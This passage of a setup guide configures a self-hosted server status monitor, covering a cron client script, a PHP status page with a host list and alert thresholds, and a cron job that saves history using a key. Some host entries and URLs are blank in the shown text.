In my case, the client script is in /root/scripts, and my webserver directory is /var/www. Change this to your own setup. Also, you might want to change the time interval. /5 executes every 5 minutes. The sed line is in there to remove the newlines, this creates a shorter JSOn file, saves some KB’s. The *root after the cron time is special for a file in /etc/cron.d/, it tells cron as which user it has to execute the crontab file.

When this is setup you should get a stat.json file in the /var/www/ folder containing the status json. If so, the client is setup correctly.


The status server is a php script which fetches the json files from the clients every 5 minutes, saves them and shows them. It also saves the history, but that is defined below.


  • Webserver with PHP (min. 5.2) and write access to the folder the script is located.


Create a new folder on the webserver and make sure the webserver user (www-data) can write to it.

Place the php file “stat.php” in that folder.

Edit the host list in the php file to include your clients:

The first parameter is the filename the json file is saved to, and the second is the URL where the json file is located.

                '' => '',
                '' => '',
                '' => '',
                '' => ''

Edit the values for the ping monitor:

$pinglist = array(

Edit the threshold values:

## Set this to "secure" the history saving. This key has to be given as a parameter to save the history.
$historykey = "8A29691737D";
#the below values set the threshold before a value gets shown in bold on the page.
# Max updates available
$maxupdates = "10";
# Max users concurrently logged in
$maxusers = "3";
# Max load.
$maxload = "2";
# Max disk usage (in percent)
$maxdisk = "75";
# Max RAM usage (in percent)
$maxram = "75";

To save the history you have to setup a cronjob to get the status page with a special “history key”. You define this in the stat.php file:

## Set this to "secure" the history saving. This key has to be given as a parameter to save the history.
$historykey = "8A29691737D";    

And then the cronjob to get it:

## This saves the history every 8 hours. 
30 */8 * * * wget -qO /dev/null

The cronjob can be on any server which can access the status page, but preferably on the host where the status page is located.